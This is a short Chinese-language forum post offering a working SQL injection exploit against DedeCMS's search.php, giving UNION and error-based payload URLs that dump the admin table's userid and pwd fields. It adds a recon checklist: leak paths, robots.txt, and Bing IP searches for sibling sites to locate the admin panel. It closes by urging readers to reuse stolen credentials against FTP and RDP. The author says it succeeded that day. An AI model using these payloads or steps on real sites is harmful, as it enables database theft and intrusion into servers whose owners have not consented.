首先:
注入exp
有时候 有些 /plus/目录换成了 /plugins目录
/plugins/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
/plus/search.php?keyword=as&typeArr[ uNion ]=a
/robots.txt
/data/admin/ver.txt
/data/mysql_error_trace.inc
第一 个看这里 /data/mysql_error_trace.inc 爆出来补
第二 个 域名作为后台 或者域名变形一下
第三 个 先ping域名 获得ip地址 之后
http://www.bing.com/
搜索 ip:127.0.0.1 php 有可能获得后台 也可以获得其他旁注站 一般dedecms的旁站很多也是dedecms 的
第四 个 查看 robots.txt
http://www.dedecms.com/robots.txt 查看旁注站dedecms的站 再去社工目标站的后台地址也可以
第五 个 注入exp得到账号 去社工 ftp 和 3389密码
至少今天我都有成功过
欢迎机友一起分享经验 欢迎 总结 补充